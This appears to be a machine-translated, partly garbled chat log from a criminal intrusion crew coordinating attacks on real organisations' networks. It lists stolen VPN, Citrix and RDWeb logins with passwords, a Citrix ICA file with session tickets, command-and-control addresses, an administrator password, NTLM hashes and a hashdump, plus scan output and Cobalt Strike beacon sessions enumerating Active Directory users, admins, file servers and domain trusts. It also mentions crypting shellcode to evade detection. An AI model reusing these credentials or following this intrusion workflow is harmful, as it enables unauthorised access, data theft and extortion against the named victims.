what is it? who last worked at 199.241.188.186?
https://protransport.cloud.com/citrix/storeweb/ rtgroup2@proloads.com blue4586
```
@user8 replaced ad infosisd@user4 from where? @user8 beep me in the confu I had a session failed (progress described in the confu@user9 @user7 in work what other 3 people are busy? and you're an admin? ok, now add a user group burned anomaly and removed the remote access group `the connection was denied because the user account is not authorized for remote login ``
what do you mean not authorized for remote login ?who has the ipn up / have access to the network ? did not understand the question who else ? @user9 at worklsadmiki some sites.i have one, from citrix can not go anywhere
iphone is up and running on a new computer - i'll try to see what's on the net under ipnomtoolchain for tests1 how many networks are up and running?
FH*(UG&$*WFHWH&*efu
``What to do next? What's the plan? You mean the citrix receiver?
I also kinda connected, but then the ddik went away@user9 and what's your problem? I connected to vpnuwin 2012``
206.221.176.24:37345
Administrator:V86Rk1Dd6Ck1yqThbD6Dh8Cg0Z8iLiiY
hotswapdate.com not yet available in the daedic is it still not fixed? the same situation I can not run cmd and powerShell is closed by the admin, the file does not fill up.what's your confab? then the lpe and so on)) if you forget: AD INFO, LA, DA, EA, DCnet, all according to the algorithm i enter the system, then as usual? or some other inputs? i do not understand the question, we work out the whole grid, i mean AD to shoot? and while the daemon is not available i still logged in, i just a little do not understand
everything there, in this link, leads to the sites[ ](https://mediaeveryone.com/channel/general?msg=TPa6bFNG43pgJ65BY) are you logged in? or a user?
https://connect.mch1.org/vpn/index.html lpsmpep2 vk2lazu4
```
@user8 replacementdescribe in confutacci@user8 where are we? ok, he'll reboot and bring him to the cobb just in case he went for a vpn taqi so weno after start I worked in it 10 minutes moreplugin citrixa haven't you run a vpn on it by chance?) yes, a few minutes he will work and then 15 is not availablepohodu dead dead (199.241.188.186) ```
https://mydesktop.sisd.net/vpn/index.html jeksae happiness3
```
@user4 change the citrix receiver something like a pass-through
but it's not going online? [ ](https://mediaeveryone.com/channel/general?msg=9uCLqBtxTJHonFyfv) the dedicator is falling off, but
I've been there - everything leads to the admin sites
JE*SG&Y*FwEYHIf7g8we
JE*SG&YY*wEYFEYffggWe ##+Dadokin ## but there's a detection rate higher there's a variant of crypta shellcode in the shellcode in the dllnea?
https://liveopsnation.okta.com/app/citrixnetscalergateway_saml/exk25j1wbvpyk8bfl2p7/sso/saml jgarcia693@aol.com thebear#1
```
@user9 replacement@user3 replacement ```
https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx bbbwalkerj Colorblue76!
Pass the dedik @user8 in the meantime, the user is logged in and then the user disappears from the list.
your changes could not be served due to an invalid configuration of the account PROD
ica file is a file that citrix receiver opens and you have to put citrix receiver which will open this file.
[Encoding]
InputEncoding=UTF8

[WFClient].
ProxyFavorIEConnectionSetting=Yes
ProxyTimeout=30000
ProxyType=Auto
ProxyUseFQDN=Off
RemoveICAFile=yes
TransparentKeyPassthrough=Local
TransportReconnectEnabled=Off
Version=2
VirtualCOMPortEmulation=On

[ApplicationServers]
Report Request Maintenance Prod=

[Report Request Maintenance Prod]
Address=;40;STA664590668;2023A7A9232D60230A425A54DEFFA6
AutologonAllowed=ON
BrowserProtocol=HTTPonTCP
CGPSecurityTicket=On
ClearPassword=53F80104235331
ClientAudio=On
DesiredColor=8
DesiredHRES=0
DesiredVRES=0
Domain=\6AA387C7B8517C82
DoNotUseDefaultCSL=On
EncryptionLevelSession=EncRC5-128
FontSmoothingType=0
HDXoverUDP=Off
HTTPBrowserAddress=!
InitialProgram=#Report Request Maintenance Prod
Launcher=WI
LaunchReference=558DD381B14D807B6BEEDE6BACFB10
LocHttpBrowserAddress=!
LogonTicket=53F801042353316AA387C7B8517C82
LogonTicketType=CTXS1
LongCommandLine=
LPWD=156
NRWD=93
ProxyTimeout=30000
ProxyType=Auto
SecureChannelProtocol=Detect
SessionsharingKey=SHNGKRJyAVxk+e5emFlorzKJwYLVSQhb
SFRAllowed=Off
SSLCiphers=all
SSLEnable=On
SSLProxyHost=ag2.cernerworks.com:443
startSCD=1606819909507
Title=Report Request Maintenance Prod
TransportDriver=TCP/IP
TRWD=0
TWIMode=On
WinStationDriver=ICA 3.0

[Compress].
DriverNameWin16=pdcompw.dll
DriverNameWin32=pdcompn.dll

[EncRC5-0].
DriverNameWin16=pdc0w.dll
DriverNameWin32=pdc0n.dll

[EncRC5-128].
DriverNameWin16=pdc128w.dll
DriverNameWin32=pdc128n.dll

[EncRC5-40].
DriverNameWin16=pdc40w.dll
DriverNameWin32=pdc40n.dll

[EncRC5-56].
DriverNameWin16=pdc56w.dll
DriverNameWin32=pdc56n.dll


``All kerbs to @tl2a, all)``or does medimizer refer to user4?
https://login.medimizer.net/rdweb/pages/en-us/login.aspx bill@biomedtechs.com 2003Proline
``Yes, I then changed the message to medimizerthere were just 2 accounts@user9 you took access from @user4 he has the domain ``mysystems4pt.com```https://apps.oasispetroleum.com/vpn/index.html bmolinaro b5ab80fbd9E!``[ ](https://mediaeveryone.com/channel/general?msg=gekDndf3GK77gi9qR) +```
https://login.medimizer.net/rdweb/pages/en-us/login.aspx bill@biomedtechs.com 2003Proline
``Zabrad https://paloca.cernerworks.com/citrix/prodweb/ dr1434 dr14349773``
https://portal.mysystems4pt.com/vpn/index.html PWilliams061
Create a confab, add you sort and write who took what accesses are valid 5 pieces``.
https://paloca.cernerworks.com/citrix/prodweb/ dr1434 dr14349773
``````
https://citrix.sharecare.com/vpn/index.html ad.alex.whittier Ph@nt0m01Beatz87
``And there will also be rdp``
https://login.medimizer.net/rdweb/pages/en-us/login.aspx office@biomedtechs.com Bmt5510shoP
https://login.medimizer.net/rdweb/pages/en-us/login.aspx bill@biomedtechs.com 2003Proline
``````
https://portal.mysystems4pt.com/vpn/index.html PWilliams061 Signal061relent
``````
https://apps.oasispetroleum.com/vpn/index.html bmolinaro b5ab80fbd9E!
``Don't you remember how it's done?'') dismantle and get to work you have 2 ddisks to work with vpn + citras from the scale of work, I give you a list of citras + vpn + citras, while will be in stockDo not, just no one needs it, all gone, someone wants another new koba?
spidfhoUSDFHI&SEUHFIjoaPS;ddsijghf
If the koba does not connect to the koba then it is inaktiv right?i have 2 inactive3 koba means workingkhaip domain with parentheses in googledav query as you wrote, with parentheses23.106.160.86 no information no domain atypip domain or ip koba checked?i have two clean cb's if there is info that ip marked as cb's then cb's in the snow search 123[.]123[.123[ ]123zasvilischestvennym as koba strike at whom koba active check the domain ip in google on detektovydam fresh yescryptor there? activesimvp.com somebody one did not sign off on koba) the rest did not have a koba?
likenic.com
104.243.40.126:38542
```
not active me ``85.150.190.113:61718`` active (it's from the last one they gave)`` the others?
```
https://ezvol.com
-
209.222.101.55:38350
Sessions from labs arrivetulkit will be closer to 15:00 fresh build, it will be given out @tl2, sootv from all of us feedback on the workrallss.com active/not activeskat me your old kobytes what about the tool kit and on kobami, in terms of work in the old or new will be?min 10 for org questions and then work directly Well hello again everyone, it's been a long time we did not communicate with you now 5) 5) total 4? all in place and start)Good day:space_invader:hello\Good day to you all
Windows IP Configuration

   Host Name . . . . . . .: UKHECSLT3028
   Primary Dns Suffix . . . . ♪ matches.com ♪
   Node Type ... ... . ♪ Hybrid ♪
   IP Routing Enabled . . . . No.
   WINS Proxy Enabled. .: No
   DNS Suffix Search List. . matches.com
                                       Home

Ethernet adapter Ethernet:

   Media state ... ... ... ♪ Media disconnected ♪
   Connection-specific DNS Suffix :
   Description . . . . . . . ♪ Intel(R) Ethernet Connection (6) I219-V ♪ Intel(R) Ethernet Connection (6) I219-V
   Physical Address . . . . .: E8-D8-D1-F3-F7-7E
   DHCP Enabled . . . . .: Yes
   Autoconfiguration Enabled . .: Yes

Wireless LAN adapter Local Area Connection* 1:

   Media state ... ... ... ♪ Media disconnected ♪
   Connection-specific DNS Suffix :
   Description . . . . . ♪ Microsoft Wi-Fi Direct Virtual Adapter ♪
   Physical Address . . . . : 60-F2-62-90-AE-62
   DHCP Enabled. . . . . .: Yes
   Autoconfiguration Enabled. .: Yes

Wireless LAN adapter Local Area Connection* 2:

   Media state ... ... ... ♪ Media disconnected ♪
   Connection-specific DNS Suffix :
   Description . . . . . . ♪ Microsoft Wi-Fi Direct Virtual Adapter #2 ♪
   Physical Address . . . . .: 62-F2-62-90-AE-61
   DHCP Enabled. . . . .: Yes
   Autoconfiguration Enabled. .: Yes

Ethernet adapter Ethernet 2:

   Media state ... ... ... ♪ Media disconnected ♪
   Connection-specific DNS Suffix :
   Description . . . . . . .: Fortinet Virtual Ethernet Adapter (NDIS 6.30) .
   Physical Address . . . . .: 00-09-0F-FE-00-01
   DHCP Enabled . . . . Yes
   Autoconfiguration Enabled . .: Yes

Wireless LAN adapter WiFi:

   Connection-specific DNS Suffix :
   Description . . . . . : Intel(R) Wi-Fi 6 AX200 160MHz
   Physical Address . . . . .: 3E-5E-B9-EB-F9-F8
   DHCP Enabled . . . . .: Yes
   Autoconfiguration Enabled. .: Yes
   IPv6 Address. . . . : 2a02:c7f:d417:c000:fcae:695d:8216:8644(Preferred)
   IPv6 Address. . . . : fda8:e756:3c36:0:fcae:695d:8216:8644(Preferred)
   Temporary IPv6 Address. . . : 2a02:c7f:d417:c000:848b:70e:a51c:a5c3(Preferred)
   Temporary IPv6 Address. . . : fda8:e756:3c36:0:6806:3a52:eadd:8175(Preferred)
   Link-local IPv6 Address . . . : fe80::fcae:695d:8216:8644%10(Preferred)
   IPv4 Address . . . . . 192.168.0.16(Preferred)
   Subnet Mask . . . : 255.255.255.0
   Lease Obtained . . . . ♪ 21 September 2020 17:20:50 ♪
   Lease Expires . . . . ♪ 23 September 2020 13:55:43 ♪
   Default Gateway . . . . : fe80::3e89:94ff:fe6e:1249%10
                                       192.168.0.1
   DHCP Server . . . . : 192.168.0.1
   DHCPv6 IAID . . . . : 174125666
   DHCPv6 Client DUID . . . . : 00-01-00-01-25-FB-F4-0B-E8-D8-D1-F3-F7-7E
   DNS Servers . . . . : fda8:e756:3c36:0:3e89:94ff:fe6e:1248
   NetBIOS over Tcpip . . . .: Enabled

Ethernet adapter Bluetooth Network Connection:

   Media state ... ... ... ♪ Media disconnected ♪
   Connection-specific DNS Suffix :
   Description . . . . . ♪ Bluetooth Device (Personal Area Network) ♪
   Physical Address . . . . .: 60-F2-62-90-AE-65
   DHCP Enabled. . . . .: Yes
   Autoconfiguration Enabled. .: Yes

Tunnel adapter Teredo Tunneling Pseudo-Interface:

   Connection-specific DNS Suffix :
   Description . . . . . ♪ Microsoft Teredo Tunneling Adapter ♪
   Physical Address . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled . . . . .: No
   Autoconfiguration Enabled . .: Yes
   IPv6 Address. . . . : 2001:0:2851:7ae4:2036:bad:a1f9:8e7c(Preferred)
   Link-local IPv6 Address . . . : fe80::2036:bad:a1f9:8e7c%11(Preferred)
   Default Gateway . . . . :
   NetBIOS over Tcpip . . . . : Disabled

``````
(ARP) Target '192.168.0.16' is alive. 3E-5E-B9-EB-F9-F8
(ARP) Target '192.168.0.1' is alive. 3C-89-94-6E-12-49
(ARP) Target '192.168.0.26' is alive. BC-A5-11-97-4D-A1
(ARP) Target '192.168.0.12' is alive. (ARP) Target '192.168.0.3' is alive. (ARP) Target '192.168.0.23' is alive. 02(ARP) Target '192.168.0.2' is alive. AC(ARP) Target '192.168.0.4' is alive. (ARP) Target '192.168.0.8' is alive.
(ARP) Target '192.168.0.6' is alive. B0-68-E6-1D-DC-8F
(ARP) Target '192.168.0.18' is alive. F0-99-B6-26-91-33
(ARP) Target '192.168.0.9' is alive. 0C-B2-B7-1C-9C-9B
(ARP) Target '192.168.0.7' is alive. 02-0F-B5-81-CD-E1
(ARP) Target '192.168.0.17' is alive. BC-92-6B-7A-D8-BF
(ARP) Target '192.168.0.10' is alive. (ARP) Target '192.168.0.13' is alive. C098--3801--96A7--6492--6437--DC83
(ARP) Target '192.168.0.128' is alive. 02-0F-B5-0B-15-44
192.168.0.10:631
192.168.0.10:515
192.168.0.10:443
192.168.0.10:23
192.168.0.10:80
192.168.0.10:21 (220 FTP print service:V-1.13/Use the network password for the ID if updating.)
192.168.0.7:5000
192.168.0.7:53
192.168.0.7:80
192.168.0.8:80
192.168.0.16:5040
192.168.0.16:3389
192.168.0.16:999
192.168.0.16:443
192.168.0.1:5431
192.168.0.16:139
192.168.0.16:135
192.168.0.16:80
192.168.0.1:5300
192.168.0.1:443
192.168.0.1:80
192.168.0.1:53
192.168.0.16:445 (platform: 500 version: 10.0 name: UKHECSLT3028 domain: MATCHES)
``vpn does not seem to be connected``
Domain: UKHECSLT3028
Login: Administrator
Password: 192837465S!
NTLM: f490c4823837a7d002e0176f3c5203ad


Domain: MATCHES
Login: mercedesd
Password: Dinham2323
NTLM: 7c839aa54221edb65e959f18ab9bde41
````hashdump`
```
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f490c4823837a7d002e0176f3c5203ad:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:1a20cb05b4b6db77e592dee4e974e4d9:::
``AdFind dies on local admin, under other users doesn't work at all
```
[*] Tasked beacon to run: C:\Users\Administrator\AdFind.exe -f "(objectcategory=person)" > ad_users.txt
[+] host called home, sent: 108 bytes
[+] received output:

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

LDAP_BIND: [] Error 0x51 (81) - Server Down
Terminating program.

``````
beacon> shell net localgroup "Administrators"
[*] Tasked beacon to run: net localgroup "Administrators"
[+] host called home, sent: 62 bytes
[+] received output:
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
MATCHES\domain admins
MATCHES\sec_WorkstationLocalAdmin
The command completed successfully.

``All>operatingSystem: Windows Server 2012 R2 Standard misread[ ](https://mediaeveryone.com/group/saiglobal-com?msg=k7PCBz9uHZfYGa3QG) yes, I got that from the description in ad_comp``
beacon> shell tasklist /s 10.225.10.53 /v
[*] Tasked beacon to run: tasklist /s 10.225.10.53 /v
[+] host called home, sent: 58 bytes
[+] received output:

Image Name PID Session Name Session# Mem Usage User Name CPU Time
========================= ======== ================ =========== ============ ================================================== ============
System Idle Process 0 Services 0 4 K NT AUTHORITY\SYSTEM 830:25:19
System 4 Services 0 276 K N/A 0:40:04
smss.exe 236 Services 0 1,036 K NT AUTHORITY\SYSTEM 0:00:00
csrss.exe 332 Services 0 4,020 K NT AUTHORITY\SYSTEM 0:00:44
wininit.exe 388 Services 0 3,892 K NT AUTHORITY\SYSTEM 0:00:00
csrss.exe 396 Console 1 3,576 K NT AUTHORITY\SYSTEM 0:00:00
winlogon.exe 440 Console 1 5,904 K NT AUTHORITY\SYSTEM 0:00:00
services.exe 484 Services 0 10,748 K NT AUTHORITY\SYSTEM 1:35:33
lsass.exe 492 Services 0 17,544 K NT AUTHORITY\SYSTEM 0:06:05
svchost.exe 556 Services 0 11,484 K NT AUTHORITY\SYSTEM 0:01:11
svchost.exe 600 Services 0 9,812 K NT AUTHORITY\NETWORK SERVICE 0:12:19
LogonUI.exe 684 Console 1 24,144 K NT AUTHORITY\SYSTEM 0:00:00
MsMpEng.exe 696 Services 0 175,280 K NT AUTHORITY\SYSTEM 1:37:48
dwm.exe 704 Console 1 22,012 K Window Manager\DWM-1 0:00:00
svchost.exe 808 Services 0 17,876 K NT AUTHORITY\LOCAL SERVICE 0:14:12
svchost.exe 848 Services 0 15,752 K NT AUTHORITY\SYSTEM 0:00:37
svchost.exe 868 Services 0 61,204 K NT AUTHORITY\SYSTEM 2:42:51
svchost.exe 920 Services 0 14,020 K NT AUTHORITY\LOCAL SERVICE 0:00:26
svchost.exe 1000 Services 0 21,656 K NT AUTHORITY/NETWORK SERVICE 0:05:03
svchost.exe 584 Services 0 11,044 K NT AUTHORITY\LOCAL SERVICE 0:00:39
spoolsv.exe 1132 Services 0 13,264 K NT AUTHORITY\SYSTEM 0:00:11
svchost.exe 1168 Services 0 7,832 K NT AUTHORITY\SYSTEM 0:00:05
ir_agent.exe 1188 Services 0 13,808 K NT AUTHORITY\SYSTEM 0:01:04
conhost.exe 1300 Services 0 3,024 K NT AUTHORITY\SYSTEM 0:00:01
newrelic-infra.exe 1308 Services 0 26,188 K NT AUTHORITY\SYSTEM 5:46:01
ir_agent.exe 1324 Services 0 66,396 K NT AUTHORITY\SYSTEM 1:05:42
snmp.exe 1400 Services 0 6,988 K NT AUTHORITY\SYSTEM 0:02:56
svchost.exe 1416 Services 0 15,644 K NT AUTHORITY\SYSTEM 0:01:38
svchost.exe 1440 Services 0 13,916 K NT AUTHORITY\SYSTEM 0:00:39
vmtoolsd.exe 1472 Services 0 13,900 K NT AUTHORITY\SYSTEM 0:09:48
WmiApSrv.exe 1572 Services 0 8,292 K NT AUTHORITY\SYSTEM 0:01:02
wmi_exporter.exe 1656 Services 0 15,924 K NT AUTHORITY\SYSTEM 0:00:34
WmiPrvSE.exe 1764 Services 0 40,132 K NT AUTHORITY\SYSTEM 0:37:12
WmiPrvSE.exe 1784 Services 0 24,328 K NT AUTHORITY\NETWORK SERVICE 4:11:00
svchost.exe 1536 Services 0 67,976 K NT AUTHORITY\NETWORK SERVICE 0:01:17
svchost.exe 2156 Services 0 4,808 K NT AUTHORITY\NETWORK SERVICE 0:00:03
dllhost.exe 2300 Services 0 10,956 K NT AUTHORITY\SYSTEM 0:00:04
msdtc.exe 2496 Services 0 7,384 K NT AUTHORITY\NETWORK SERVICE 0:00:03
WmiPrvSE.exe 2820 Services 0 10,876 K NT AUTHORITY\LOCAL SERVICE 0:23:58
CcmExec.exe 3364 Services 0 118,580 K NT AUTHORITY\SYSTEM 0:12:01
WmiPrvSE.exe 3396 Services 0 26,704 K NT AUTHORITY\SYSTEM 0:00:36
WmiPrvSE.exe 3644 Services 0 30,296 K NT AUTHORITY\SYSTEM 0:18:55
WmiPrvSE.exe 3752 Services 0 10,024 K NT AUTHORITY\LOCAL SERVICE 0:02:27
WmiPrvSE.exe 552 Services 0 6,632 K NT AUTHORITY\LOCAL SERVICE 0:00:01
CmRcService.exe 2088 Services 0 8,784 K NT AUTHORITY\SYSTEM 0:00:09
ir_agent.exe 3136 Services 0 100,072 K NT AUTHORITY\SYSTEM 0:43:25
ir_agent.exe 244 Services 0 63,524 K NT AUTHORITY\SYSTEM 0:25:59
ir_agent.exe 3260 Services 0 47,284 K NT AUTHORITY\SYSTEM 0:05:57
csrss.exe 2252 RDP-Tcp#0 2 14,128 K NT AUTHORITY\SYSTEM 0:00:00
winlogon.exe 1068 RDP-Tcp#0 2 5,292 K NT AUTHORITY\SYSTEM 0:00:00
dwm.exe 2216 RDP-Tcp#0 2 39,120 K Window Manager\DWM-2 0:00:04
taskhostex.exe 3388 RDP-Tcp#0 2 6,520 K DATACENTER\adm.cotral0 0:00:00
rdpclip.exe 2268 RDP-Tcp#0 2 6,908 K DATACENTER\adm.cotral0 0:00:00
explorer.exe 1716 RDP-Tcp#0 2 2,236 K DATACENTER\adm.cotral0 0:00:20
WmiPrvSE.exe 2068 Services 0 15,960 K NT AUTHORITY\SYSTEM 0:00:22
vmtoolsd.exe 2916 RDP-Tcp#0 2 12,688 K DATACENTER\adm.cotral0 0:03:14
msseces.exe 2116 RDP-Tcp#0 2 13,852 K DATACENTER\adm.cotral0 0:00:00
SCNotification.exe 1100 RDP-Tcp#0 2 40,204 K DATACENTER\adm.cotral0 0:00:06
xagt.exe 2064 Services 0 7,516 K NT AUTHORITY\SYSTEM 0:00:01
xagtnotif.exe 3276 RDP-Tcp#0 2 6,520 K DATACENTER\adm.cotral0 0:00:00
ir_agent.exe 1208 Services 0 51,040 K NT AUTHORITY\SYSTEM 0:00:06
ir_agent.exe 3624 Services 0 49,988 K NT AUTHORITY\SYSTEM 0:00:06

``What does the operation system in hell do they say? UAT is hardly NAS )))) processes look more ping -> shell dir \\223145483475843\C$
?```
Supposedly saturated:
>description: C360 Client Files
	USHDC1-CSPFPS03.datacenter.local
	USHDC1-CSPFPS12.datacenter.local
	USHDC1-CSPFPS08.datacenter.local
	USHDC1-CSPFPS02.datacenter.local
	USHDC1-CSPFPS04.datacenter.local
	USHDC1-CSPFPS14.datacenter.local
	USHDC1-CSPFPS13.datacenter.local
	USHDC1-CSPFPS10.datacenter.local
	USHDC1-CSPFPS01.datacenter.local
	USHDC1-CSPFPS09.datacenter.local
	USHDC1-CSPFPS11.datacenter.local
	USHDC1-CSPFPS06.datacenter.local
	USHDC1-CSPFPS05.datacenter.local
	USHDC1-CSPFPS07.datacenter.local
>description: C360 UAT File Servers
	USHDC1-CSQFPS01.datacenter.local
	USHDC1-CSQFPS02.datacenter.local
``14 client
2 UAT all SSO can not even draw and crawl there? and they all fs? look[ ](https://mediaeveryone.com/group/saiglobal-com?msg=6LW23aHAC5BNgtnSZ) you mean what I threw above? file servers can still look if in this domain is nothing for backup, looking for virtualization) well I think the data center in other domains do not have anything too ``?
user 2-2[AUHDC1-COPADS01]SYSTEM */5008|2020Oct08 02:29:22> net view
[*] Tasked beacon to run net view
[+] host called home, sent: 104504 bytes
[+] received output:
List of hosts:

 Server Name IP Address Platform Version Type Comment
 ----------- ---------- -------- ------- ---- -------
 APP01 10.195.25.144 500 5.2 PDC

[+] received output:
 APP02 10.195.25.147 500 5.2
 AUHDC1-COPADS01 10.195.25.50 500 6.3 PDC
 AUHDC1-COPADS02 10.195.25.49 500 6.3 BDC
 AUHDC1-COPADS04 10.195.25.35 500 6.3 BDC
 AUHDC1-COPADS05 10.195.25.43 500 10.0 BDC
 AUHDC1-COPAPP08 10.195.25.20 500 6.3
 AUHDC1-COPFPS01 10.195.25.115 500 6.3
 AUHDC1-COPFPS02 10.195.25.3 500 6.3
 AUHDC1-COPFPS03 10.195.25.54 500 10.0
 AUHDC1-COPSCM01 10.195.25.210 500 6.3
 AUHDC1-COPSCM02 10.195.25.211 500 6.3
 AUHDC1-COPSCM04 10.195.25.218 500 6.3
 AUHDC1-COPSQL01 10.195.25.212 500 6.3
 AUHDC1-COPSQL02 10.195.25.213 500 6.3
 AUHDC1-COPSQL11 10.195.25.125 500 6.3
 AUHDC1-COQSQL06 10.195.25.36 500 6.3
 AUSYDE95X-SON2 10.195.25.184 500 6.0
 AUSYDHC-APP006 10.195.25.84 500 4.0
 AUSYDHC-APP016 10.195.25.76 500 5.2
 AUSYDHC-APP025 10.195.25.175 500 5.2
 AUSYDHC-APP027 10.195.25.94 500 6.0
 AUSYDHC-COPMG05 10.195.25.242 500 6.1
 AUSYDHC-CS-APP1 10.195.25.114 500 5.2
 AUSYDHC-CS-MOS1 10.195.25.63 500 5.2
 AUSYDHC-CSPSQ01 10.195.25.214 500 6.1
 AUSYDHC-EPPCON1 10.195.25.235 500 6.0
 AUSYDHC-EPPPS1 10.195.25.52 500 10.0
 AUSYDHC-EPPREP1 10.195.25.225 500 6.0
 AUSYDHC-EPPREP2 10.195.25.226 500 6.0
 AUSYDHC-EPPSON1 10.195.25.238 500 6.0
 AUSYDHC-LDS1 10.195.25.62 500 6.0
 AUSYDHC-SQL16 10.195.25.178 500 6.1
 AUSYDHQ-FS1 10.195.25.3 500 6.3
 AUSYDHQ-FS1TEST 10.195.25.3 500 6.3
``>description: C360 UAT File Servers>description: C360 Client Files and net view will not work ?
Backup
Veeam
no ``veeam``? the host names do not have any keywords pointing to nas, backup, veeam etc? and how to get them out? why? then portscan 21 22 ? they can be winnows if ad_comp has no linux, so no nas either? if there are no linuxes then there are no linuxes either :thinking:but i think at least 2-3 pcs will be open then there will be no 100% coverage and some domains will not be visible from anywhere each domain can see some trusts which originally were not visible you have 19 pcs were originally in the total 19 pcs were originallydatacenter.local
```
    0: SAIG saig.frd.global (Direct Outbound)
    1: FRD frd.global (Direct Outbound) (Direct Inbound)
    2: DATACENTER datacenter.local (Forest tree root) (Primary Domain) (Native)
``There's more, take off just from the current where @user8`saig.frd.global`` which is in the ADvot in this saiglobal.com
he had 2 datacenters in trusts[ ](https://mediaeveryone.com/group/saiglobal-com?msg=t7mimJ5JXQBP2Qbrf) please sign from which domain one domain sees some trusts from the general list that does not see the others ``
    0: 80-20 80-20.com (Direct Outbound)
    1: LEGALCO legalco.local (Direct Outbound) (Direct Inbound)
    2: FRD frd.global (Forest tree root) (Direct Outbound) (Direct Inbound)
    3: ANSTAT Anstat.local (Direct Outbound) (Direct Inbound)
    4: LEADERS leaders.frd.global
    5: AUST standards.com.au (Direct Outbound) (Direct Inbound)
    6: SAIGPROD SaigProd.local (Direct Outbound) (Direct Inbound)
    7: C360 c360.local (Direct Outbound) (Direct Inbound)
    8: DATACENTER datacenter.local (Direct Outbound) (Direct Inbound)
    9: C360UK c360uk.local (Direct Outbound) (Direct Inbound)
    10: SAIG saig.frd.global (Forest 2) (Primary Domain) (Native)
They are not 1 in 1between different domains where sessions hangs just net domain_trusts the same name and the same1 of the quarantines in trusts 2 datacenter exactly not understand at least noticed different between frd.global and saig...., datacenter ... in trusts then all the same have to get into the rest of the domain-[ ](https://mediaeveryone.com/group/saiglobal-com?msg=BxbusgHiy84BsvA2G) trusts in terms of direct new or trusts from this?
Web Server - 25
```
and there are other servers in this category which respond to pings correctly ? you still have not dealt with new domains? can i do it tomorrow or still look for options kinin in 100% lols in datacenters dka you ping from where kst? => sds and cso in dizable, web i leave? besides this in 1 domain is not particularly critical i think100% lolsstukRDS - 2
Web Server - 25
SSO - 1category? what is meant by "critical "28critical? a lot of them? servers with 100% loss also in Disabled? right) and now pinging all to see which are still cut off :sunglasses:aha in Disabled Servers then?
beacon> shell ping USHDC1-CSPSPH01.datacenter.local
[*] Tasked beacon to run: ping USHDC1-CSPSPH01.datacenter.local
[+] host called home, sent: 68 bytes
[+] received output:
Ping request could not find host USHDC1-CSPSPH01.datacenter.local. Please check the name and try again.

beacon> shell ping USHDC1-CSPSPH02.datacenter.local
[*] Tasked beacon to run: ping USHDC1-CSPSPH02.datacenter.local
[+] host called home, sent: 68 bytes
[+] received output:
Ping request could not find host USHDC1-CSPSPH02.datacenter.local. Please check the name and try again.
```
These are the last OU=C360 - SSO servers with different outbound services I guess
OU=SCCM - SCCM servers
the last one I don't know...
CN=USHDC1-CSPFPS03,OU=Production,OU=C360,OU=Servers,OU=0.SAI Global,DC=datacenter,DC=local

>dNSHostName: USHDC1-CSPFPS03.datacenter.local
>servicePrincipalName: CmRcService/USHDC1-CSPFPS03
>servicePrincipalName: CmRcService/USHDC1-CSPFPS03.datacenter.local
>servicePrincipalName: WSMAN/USHDC1-CSPFPS03
>servicePrincipalName: WSMAN/USHDC1-CSPFPS03.datacenter.local
>servicePrincipalName: TERMSRV/USHDC1-CSPFPS03
>servicePrincipalName: TERMSRV/USHDC1-CSPFPS03.datacenter.local
>servicePrincipalName: RestrictedKrbHost/USHDC1-CSPFPS03
>servicePrincipalName: HOST/USHDC1-CSPFPS03
>servicePrincipalName: RestrictedKrbHost/USHDC1-CSPFPS03.datacenter.local
>servicePrincipalName: HOST/USHDC1-CSPFPS03.datacenter.local
```
```
CN=USHDC1-CSPMGW02,OU=Production,OU=C360,OU=Servers,OU=0.SAI Global,DC=datacenter,DC=local

>dNSHostName: USHDC1-CSPMGW02.datacenter.local
>servicePrincipalName: WSMAN/USHDC1-CSPMGW02.datacenter.local
>servicePrincipalName: WSMAN/USHDC1-CSPMGW02
>servicePrincipalName: CmRcService/USHDC1-CSPMGW02.datacenter.local
>servicePrincipalName: CmRcService/USHDC1-CSPMGW02
>servicePrincipalName: TERMSRV/USHDC1-CSPMGW02.datacenter.local
>servicePrincipalName: TERMSRV/USHDC1-CSPMGW02
>servicePrincipalName: RestrictedKrbHost/USHDC1-CSPMGW02
>servicePrincipalName: HOST/USHDC1-CSPMGW02
>servicePrincipalName: RestrictedKrbHost/USHDC1-CSPMGW02.datacenter.local
>servicePrincipalName: HOST/USHDC1-CSPMGW02.datacenter.local
```

```
CN=USHDC1-CSPAPP23,OU=Production,OU=C360,OU=Servers,OU=0.SAI Global,DC=datacenter,DC=local

>dNSHostName: USHDC1-CSPAPP23.datacenter.local
>servicePrincipalName: CmRcService/USHDC1-CSPAPP23
>servicePrincipalName: CmRcService/USHDC1-CSPAPP23.datacenter.local
>servicePrincipalName: WSMAN/USHDC1-CSPAPP23
>servicePrincipalName: WSMAN/USHDC1-CSPAPP23.datacenter.local
>servicePrincipalName: TERMSRV/USHDC1-CSPAPP23
>servicePrincipalName: TERMSRV/USHDC1-CSPAPP23.datacenter.local
>servicePrincipalName: RestrictedKrbHost/USHDC1-CSPAPP23
>servicePrincipalName: HOST/USHDC1-CSPAPP23
>servicePrincipalName: RestrictedKrbHost/USHDC1-CSPAPP23.datacenter.local
>servicePrincipalName: HOST/USHDC1-CSPAPP23.datacenter.local
```

```
CN=USHDC1-COPSCM02,OU=SCCM,OU=Corporate IT,OU=Servers,OU=0.SAI Global,DC=datacenter,DC=local

>dNSHostName: USHDC1-COPSCM02.datacenter.local
>servicePrincipalName: CmRcService/USHDC1-COPSCM02.datacenter.local
>servicePrincipalName: CmRcService/USHDC1-COPSCM02
>servicePrincipalName: WSMAN/USHDC1-COPSCM02.datacenter.local
>servicePrincipalName: WSMAN/USHDC1-COPSCM02
>servicePrincipalName: TERMSRV/USHDC1-COPSCM02.datacenter.local
>servicePrincipalName: TERMSRV/USHDC1-COPSCM02
>servicePrincipalName: RestrictedKrbHost/USHDC1-COPSCM02
>servicePrincipalName: HOST/USHDC1-COPSCM02
>servicePrincipalName: RestrictedKrbHost/USHDC1-COPSCM02.datacenter.local
>servicePrincipalName: HOST/USHDC1-COPSCM02.datacenter.local
```

```
CN=USHDC1-CSPSPH02,OU=Production,OU=DM360,OU=Servers,OU=0.SAI Global,DC=datacenter,DC=local

